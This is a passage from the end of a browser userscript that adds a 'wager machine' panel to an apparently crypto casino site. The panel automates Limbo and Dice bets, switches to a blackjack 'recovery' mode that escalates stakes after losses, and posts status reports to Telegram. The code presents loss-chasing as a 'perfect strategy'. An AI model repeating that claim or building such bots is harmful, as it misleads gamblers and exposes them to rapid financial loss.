                border-radius: 16px;
                padding: 12px;
                margin-bottom: 12px;
                border: 1px solid #1E293B;
                backdrop-filter: blur(4px);
            }
            .orion-section-title {
                font-size: 11px;
                font-weight: 600;
                text-transform: uppercase;
                letter-spacing: 0.5px;
                color: #38BDF8;
                margin-bottom: 12px;
                display: flex;
                align-items: center;
                gap: 6px;
            }
            .orion-grid {
                display: grid;
                grid-template-columns: 1fr 1fr;
                gap: 8px;
            }
            .orion-input-group {
                display: flex;
                flex-direction: column;
                gap: 4px;
            }
            .orion-input-group label {
                font-size: 9px;
                font-weight: 500;
                color: #94A3B8;
                text-transform: uppercase;
                letter-spacing: 0.3px;
            }
            .orion-input {
                width: 100%;
                background: #030712;
                border: 1px solid #1E293B;
                color: #F1F5F9;
                padding: 8px 10px;
                border-radius: 10px;
                font-size: 12px;
                box-sizing: border-box;
                transition: all 0.15s;
                font-family: 'SF Mono', Monaco, 'Cascadia Code', monospace;
            }
            .orion-input:focus {
                outline: none;
                border-color: #38BDF8;
                box-shadow: 0 0 0 2px rgba(56, 189, 248, 0.2);
            }
            .orion-select {
                width: 100%;
                background: #030712;
                border: 1px solid #1E293B;
                color: #F1F5F9;
                padding: 8px 10px;
                border-radius: 10px;
                font-size: 12px;
                cursor: pointer;
            }
            .orion-checkbox {
                display: flex;
                align-items: center;
                gap: 8px;
                margin: 10px 0;
                padding: 4px 0;
            }
            .orion-checkbox input {
                width: 16px;
                height: 16px;
                accent-color: #38BDF8;
                margin: 0;
            }
            .orion-checkbox label {
                font-size: 12px;
                color: #CBD5E1;
            }
            .orion-stats {
                background: #030712;
                border-radius: 16px;
                padding: 14px;
                border: 1px solid #1E293B;
                margin-bottom: 12px;
            }
            .orion-stat-row {
                display: flex;
                justify-content: space-between;
                padding: 6px 0;
                border-bottom: 1px solid rgba(30, 41, 59, 0.5);
            }
            .orion-stat-row:last-child {
                border-bottom: none;
            }
            .orion-stat-label {
                color: #94A3B8;
                font-weight: 400;
            }
            .orion-stat-value {
                font-weight: 600;
                color: #F1F5F9;
                font-family: 'SF Mono', Monaco, monospace;
            }
            .orion-stat-value.positive {
                color: #4ADE80;
            }
            .orion-stat-value.negative {
                color: #F87171;
            }
            .orion-buttons {
                display: flex;
                gap: 8px;
                margin-top: 8px;
            }
            .orion-btn {
                flex: 1;
                padding: 12px;
                border: none;
                border-radius: 30px;
                font-weight: 600;
                font-size: 13px;
                cursor: pointer;
                transition: all 0.2s;
                text-transform: uppercase;
                letter-spacing: 0.5px;
            }
            .orion-btn-start {
                background: linear-gradient(135deg, #38BDF8, #818CF8);
                color: #030712;
                box-shadow: 0 4px 12px rgba(56, 189, 248, 0.3);
            }
            .orion-btn-start:hover {
                transform: translateY(-1px);
                box-shadow: 0 6px 16px rgba(56, 189, 248, 0.4);
            }
            .orion-btn-stop {
                background: rgba(239, 68, 68, 0.1);
                border: 1px solid rgba(239, 68, 68, 0.3);
                color: #FCA5A5;
            }
            .orion-btn-stop:hover {
                background: rgba(239, 68, 68, 0.2);
                border-color: #EF4444;
            }
            .orion-log {
                margin-top: 8px;
                padding: 8px 12px;
                background: #030712;
                border-radius: 12px;
                font-size: 10px;
                color: #FBBF24;
                border: 1px solid #1E293B;
                word-break: break-word;
            }
            .orion-game-badge {
                display: inline-block;
                background: rgba(56, 189, 248, 0.2);
                border-radius: 20px;
                padding: 2px 10px;
                font-size: 9px;
                color: #38BDF8;
                margin-left: 8px;
            }
            .recovery-badge {
                display: inline-block;
                padding: 2px 8px;
                border-radius: 12px;
                font-size: 9px;
                font-weight: 600;
                margin-left: 6px;
            }
            .recovery-badge.active {
                background: rgba(239, 68, 68, 0.2);
                color: #FCA5A5;
                border: 1px solid rgba(239, 68, 68, 0.3);
            }
            .recovery-badge.standby {
                background: rgba(234, 179, 8, 0.2);
                color: #FCD34D;
                border: 1px solid rgba(234, 179, 8, 0.3);
            }
            .recovery-badge.disabled {
                background: rgba(100, 116, 139, 0.2);
                color: #94A3B8;
                border: 1px solid rgba(100, 116, 139, 0.3);
            }
            .blackjack-display {
                background: #030712;
                border-radius: 16px;
                padding: 12px;
                margin: 12px 0;
                border: 1px solid #1E293B;
            }
            .blackjack-row {
                display: flex;
                justify-content: space-between;
                align-items: center;
                padding: 8px;
                background: rgba(0,0,0,0.3);
                border-radius: 12px;
                margin-bottom: 8px;
            }
            .blackjack-label {
                font-size: 11px;
                font-weight: 600;
                color: #94A3B8;
                text-transform: uppercase;
                min-width: 60px;
            }
            .blackjack-cards {
                font-size: 14px;
                font-weight: 600;
                font-family: 'SF Mono', Monaco, monospace;
                color: #F1F5F9;
                flex: 1;
            }
            .blackjack-cards.player {
                color: #4ADE80;
            }
            .blackjack-cards.dealer {
                color: #F87171;
            }
            .blackjack-value {
                font-size: 12px;
                color: #FBBF24;
                margin-left: 8px;
            }
            .blackjack-actions {
                margin-top: 8px;
                padding: 8px;
                background: rgba(56, 189, 248, 0.1);
                border-radius: 30px;
                border: 1px solid rgba(56, 189, 248, 0.2);
                text-align: center;
                font-size: 11px;
            }
            .blackjack-last-result {
                margin-top: 8px;
                padding: 8px;
                background: rgba(0,0,0,0.5);
                border-radius: 8px;
                font-size: 11px;
                color: #CBD5E1;
                border: 1px solid #1E293B;
                text-align: center;
            }
            .recovery-status-text {
                font-size: 10px;
                margin-left: 24px;
                margin-top: 4px;
                padding: 4px 8px;
                border-radius: 12px;
                display: inline-block;
            }
            .recovery-status-text.enabled {
                background: rgba(34, 197, 94, 0.2);
                color: #4ADE80;
                border: 1px solid rgba(34, 197, 94, 0.3);
            }
            .recovery-status-text.disabled {
                background: rgba(239, 68, 68, 0.2);
                color: #F87171;
                border: 1px solid rgba(239, 68, 68, 0.3);
            }
            @media (max-width: 480px) {
                #orion-wrap {
                    top: 5px;
                    right: 5px;
                    width: calc(100vw - 10px);
                    padding: 12px;
                }
            }
        `;
        document.head.appendChild(s);
        
        const d = document.createElement("div");
        d.id = "orion-wrap";
        d.innerHTML = `
            <div class="orion-header">
                <div class="orion-title">
                    <span>⚡</span> ORION WAGER MACHINE <span>⚡</span>
                </div>
                <div class="orion-badge">v1 PREMIUM</div>
            </div>
            
            <div class="orion-user" id="st-user">
                Loading...
            </div>
            
            <div class="orion-section">
                <div class="orion-section-title">
                    <span>⚙️</span> SYSTEM CONFIG
                </div>
                <div class="orion-grid">
                    <div style="grid-column: span 2">
                        <div class="orion-input-group">
                            <label>CURRENCY</label>
                            <select id="p-currency" class="orion-select"></select>
                        </div>
                    </div>
                    <div class="orion-input-group">
                        <label>LIMBO BASE BET</label>
                        <input id="p-limbo-basebet" class="orion-input" value="0.001" step="any">
                    </div>
                    <div class="orion-input-group">
                        <label>DICE BASE BET</label>
                        <input id="p-dice-basebet" class="orion-input" value="0.001" step="any">
                    </div>
                    <div class="orion-input-group">
                        <label>DIVIDER</label>
                        <input id="p-div" class="orion-input" value="2000" placeholder="0 = manual basebet">
                    </div>
                </div>
            </div>
            
            <div class="orion-section">
                <div class="orion-section-title">
                    <span>🎲</span> LIMBO STRATEGY
                </div>
                <div class="orion-grid">
                    <div class="orion-input-group">
                        <label>PAYOUT</label>
                        <input id="p-limbo-payout" class="orion-input" value="1.0001" step="0.0001">
                    </div>
                    <div class="orion-input-group">
                        <label>CYCLES</label>
                        <input id="p-limbo-cycles" class="orion-input" value="3">
                    </div>
                </div>
            </div>
            
            <div class="orion-section">
                <div class="orion-section-title">
                    <span>🎯</span> DICE STRATEGY
                </div>
                <div class="orion-grid">
                    <div class="orion-input-group">
                        <label>CHANCE %</label>
                        <input id="p-dice-chance" class="orion-input" value="98" step="0.1">
                    </div>
                    <div class="orion-input-group">
                        <label>CYCLES</label>
                        <input id="p-dice-cycles" class="orion-input" value="2">
                    </div>
                </div>
            </div>
            
            <div class="orion-section">
                <div class="orion-section-title">
                    <span>🃏</span> BLACKJACK RECOVERY MODE (PERFECT STRATEGY)
                    <span id="recovery-status-badge" class="recovery-badge disabled">DISABLED</span>
                </div>
                <div class="orion-checkbox">
                    <input type="checkbox" id="p-use-recovery" checked>
                    <label>Enable Blackjack Recovery</label>
                </div>
                <div id="recovery-toggle-status" class="recovery-status-text enabled">✓ BLACKJACK RECOVERY IS ENABLED</div>
                
                <div class="orion-grid">
                    <div class="orion-input-group">
                        <label>BASE BET</label>
                        <input id="p-blackjack-basebet" class="orion-input" value="0.001" step="any">
                    </div>
                    <div class="orion-input-group">
                        <label>PROGRESSION STEPS</label>
                        <input id="p-recovery-steps" class="orion-input" value="[1,2,3,4,8,16,32,64,128,256,511]">
                    </div>
                    <div class="orion-input-group">
                        <label>LOSS TRIGGER %</label>
                        <input id="p-loss-trigger" class="orion-input" value="1.0" step="0.1">
                    </div>
                    <div class="orion-input-group">
                        <label>MAX ATTEMPTS</label>
                        <input id="p-max-recovery" class="orion-input" value="3" step="1">
                    </div>
                    <div class="orion-checkbox" style="grid-column: span 2">
                        <input type="checkbox" id="p-blackjack-insurance">
                        <label>Take Insurance when offered</label>
                    </div>
                </div>
                
                <!-- BLACKJACK DISPLAY -->
                <div class="blackjack-display" id="blackjack-display">
                    <div class="blackjack-row">
                        <span class="blackjack-label">PLAYER</span>
                        <span class="blackjack-cards player" id="blackjack-player-cards">-</span>
                        <span class="blackjack-value" id="blackjack-player-value"></span>
                    </div>
                    <div class="blackjack-row">
                        <span class="blackjack-label">DEALER</span>
                        <span class="blackjack-cards dealer" id="blackjack-dealer-cards">-</span>
                        <span class="blackjack-value" id="blackjack-dealer-value"></span>
                    </div>
                    <div class="blackjack-actions" id="blackjack-actions">-</div>
                    <div class="blackjack-last-result" id="blackjack-last-result">No result yet</div>
                </div>
            </div>
            
            <div class="orion-stats">
                <div class="orion-stat-row">
                    <span class="orion-stat-label">TIME</span>
                    <span class="orion-stat-value" id="st-time">00:00:00</span>
                </div>
                <div class="orion-stat-row">
                    <span class="orion-stat-label">STATUS</span>
                    <span class="orion-stat-value" id="st-status" style="color: #38BDF8">IDLE</span>
                </div>
                <div class="orion-stat-row">
                    <span class="orion-stat-label">RECOVERY</span>
                    <span class="orion-stat-value" id="st-recovery">DISABLED</span>
                </div>
                <div class="orion-stat-row">
                    <span class="orion-stat-label">BALANCE</span>
                    <span class="orion-stat-value" id="st-startbal">0.00000000</span>
                </div>
                <div class="orion-stat-row">
                    <span class="orion-stat-label">PROFIT</span>
                    <span class="orion-stat-value" id="st-profit">0.00000000</span>
                </div>
                <div class="orion-stat-row">
                    <span class="orion-stat-label">WAGERED</span>
                    <span class="orion-stat-value" id="st-wager">0.00000000</span>
                </div>
                <div class="orion-stat-row">
                    <span class="orion-stat-label">MAX DD</span>
                    <span class="orion-stat-value" style="color: #F87171" id="st-dd">0.00000000</span>
                </div>
                <div class="orion-stat-row">
                    <span class="orion-stat-label">BETS</span>
                    <span class="orion-stat-value" id="st-bets">0</span>
                </div>
                <div class="orion-stat-row">
                    <span class="orion-stat-label">W/L</span>
                    <span class="orion-stat-value" id="st-wl">0/0</span>
                </div>
                <div class="orion-stat-row">
                    <span class="orion-stat-label">WIN RATE</span>
                    <span class="orion-stat-value" id="st-winrate">0%</span>
                </div>
                <div class="orion-stat-row">
                    <span class="orion-stat-label">SPEED</span>
                    <span class="orion-stat-value" id="st-speed">0 b/s</span>
                </div>
            </div>
            
            <div class="orion-log" id="st-log">
                None
            </div>
            
            <div class="orion-buttons">
                <button id="p-start" class="orion-btn orion-btn-start">START</button>
                <button id="p-stop" class="orion-btn orion-btn-stop">STOP</button>
            </div>
        `;
        
        document.body.appendChild(d);
        
        // Fungsi untuk update status toggle
        function updateRecoveryToggleStatus(enabled) {
            const statusEl = document.getElementById("recovery-toggle-status");
            if (enabled) {
                statusEl.className = "recovery-status-text enabled";
                statusEl.innerHTML = "✓ BLACKJACK RECOVERY IS ENABLED";
            } else {
                statusEl.className = "recovery-status-text disabled";
                statusEl.innerHTML = "✗ BLACKJACK RECOVERY IS DISABLED";
            }
        }
        
        // Event listener untuk checkbox recovery
        document.getElementById("p-use-recovery").addEventListener("change", function(e) {
            updateRecoveryToggleStatus(e.target.checked);
            updateRecoveryUI();
        });
        
        function updateRecoveryUI() {
            const enabled = document.getElementById("p-use-recovery").checked;
            const badge = document.getElementById("recovery-status-badge");
            const recoveryStat = document.getElementById("st-recovery");
            
            if (enabled) {
                if (bot.recoveryMode) {
                    badge.className = "recovery-badge active";
                    badge.innerText = "ACTIVE";
                    if (recoveryStat) recoveryStat.innerText = "ACTIVE";
                } else {
                    badge.className = "recovery-badge standby";
                    badge.innerText = "STANDBY";
                    if (recoveryStat) recoveryStat.innerText = "STANDBY";
                }
            } else {
                badge.className = "recovery-badge disabled";
                badge.innerText = "DISABLED";
                if (recoveryStat) recoveryStat.innerText = "DISABLED";
            }
        }
        
        // Set initial toggle status
        updateRecoveryToggleStatus(true);
        
        document.getElementById("p-start").onclick = async () => { 
            if(!bot.isRunning){ 
                await API.syncOnce(); 
                bot.isRunning = true; 
                bot.startTime = new Date(); 
                bot.stats.bets = 0; 
                bot.stats.profit = 0; 
                bot.stats.wagered = 0; 
                bot.stats.wins = 0; 
                bot.stats.loss = 0; 
                bot.stats.maxDD = 0;
                bot.switchCounter = 0;
                bot.currentGame = "limbo";
                bot.nextSwitchAt = parseInt(document.getElementById("p-limbo-cycles").value) || 3;
                
                // Reset recovery
                bot.recoveryMode = false;
                bot.recoveryAttempts = 0;
                bot.recoveryConsecutiveLosses = 0;
                bot.blackjackState = {
                    identifier: null,
                    gameId: null,
                    playerHands: [],
                    dealerHand: [],
                    active: false,
                    currentHandIndex: 0,
                    insuranceOffered: false
                };
                bot.lastBetResult = null;
                
                updateRecoveryUI();
                
                setTimeout(() => API.sendTg("🚀 *SYSTEM ENGAGED*"), 1000);
                
                if (reportInterval) clearInterval(reportInterval);
                reportInterval = setInterval(() => {
                    if (bot.isRunning) {
                        API.sendTg("📊 *PERIODIC REPORT*");
                    }
                }, 180000);
                
                runLoop(); 
            } 
        };
        
        document.getElementById("p-stop").onclick = () => { 
            if(bot.isRunning){ 
                bot.isRunning = false; 
                if (reportInterval) {
                    clearInterval(reportInterval);
                    reportInterval = null;
                }
                API.sendTg("🛑 *SYSTEM HALTED*"); 
            } 
        };
    }

    setInterval(() => {
        if (!document.getElementById("st-time")) return;
        
        // Update UI stats
        if (bot.isRunning && bot.startTime) {
            const elapsed = (new Date() - bot.startTime) / 1000;
            document.getElementById("st-time").innerText = new Date(elapsed * 1000).toISOString().substr(11, 8);
        }
        
        let statusText = bot.currentStatus;
        if (bot.recoveryMode) {
            statusText = `🔥 RECOVERY #${bot.recoveryAttempts} (Step ${bot.recoveryConsecutiveLosses+1})`;
        } else {
            statusText = `${bot.currentStatus} (${bot.currentGame})`;
        }
        document.getElementById("st-status").innerText = statusText;
        
        const currentBalance = bot.stats.startBal + bot.stats.profit;
        document.getElementById("st-startbal").innerText = currentBalance.toFixed(8);
        document.getElementById("st-profit").innerText = bot.stats.profit.toFixed(8);
        document.getElementById("st-wager").innerText = bot.stats.wagered.toFixed(8);
        document.getElementById("st-dd").innerText = bot.stats.maxDD.toFixed(8);
        document.getElementById("st-bets").innerText = bot.stats.bets;
        document.getElementById("st-wl").innerText = `${bot.stats.wins}/${bot.stats.loss}`;
        
        // Hitung win rate
        const winRate = bot.stats.bets > 0 ? ((bot.stats.wins / bot.stats.bets) * 100).toFixed(2) : 0;
        document.getElementById("st-winrate").innerText = `${winRate}%`;
        
        document.getElementById("st-speed").innerText = bot.startTime ? (bot.stats.bets / ((new Date() - bot.startTime) / 1000 || 1)).toFixed(2) + " b/s" : "0 b/s";
        document.getElementById("st-log").innerText = bot.lastError;
        
        // Update recovery status di UI
        const useRecovery = document.getElementById("p-use-recovery")?.checked;
        if (useRecovery !== undefined) {
            if (!useRecovery) {
                bot.recoveryStatus = "DISABLED";
            } else if (bot.recoveryMode) {
                bot.recoveryStatus = "ACTIVE";
            } else if (bot.isRunning) {
                bot.recoveryStatus = "STANDBY";
            } else {
                bot.recoveryStatus = "DISABLED";
            }
            
            const badge = document.getElementById("recovery-status-badge");
            const recoveryStat = document.getElementById("st-recovery");
            
            if (badge) {
                badge.className = `recovery-badge ${bot.recoveryStatus.toLowerCase()}`;
                badge.innerText = bot.recoveryStatus;
            }
            if (recoveryStat) {
                recoveryStat.innerText = bot.recoveryStatus;
            }
        }
        
        // Update Blackjack display
        updateBlackjackDisplay();
    }, 400);

    createUI(); 
    API.syncOnce();
})();
